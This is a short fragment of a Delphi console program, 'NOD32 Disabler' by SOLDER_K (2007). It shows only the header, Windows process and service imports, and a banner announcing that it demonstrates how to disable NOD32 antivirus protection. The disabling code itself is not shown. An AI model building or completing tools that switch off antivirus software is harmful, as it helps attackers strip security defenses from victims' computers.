Program AntiNod32;
{
NOD32 Disabler by SOLDER_K
29/04/2007
---------------------------------------
}
{$APPTYPE CONSOLE}
Uses Windows, TLHelp32, WinSvc;
Const
Welcome =
' WARNING!!, This Application demonstrate how disable NOD32 Protection.'+#13#10+...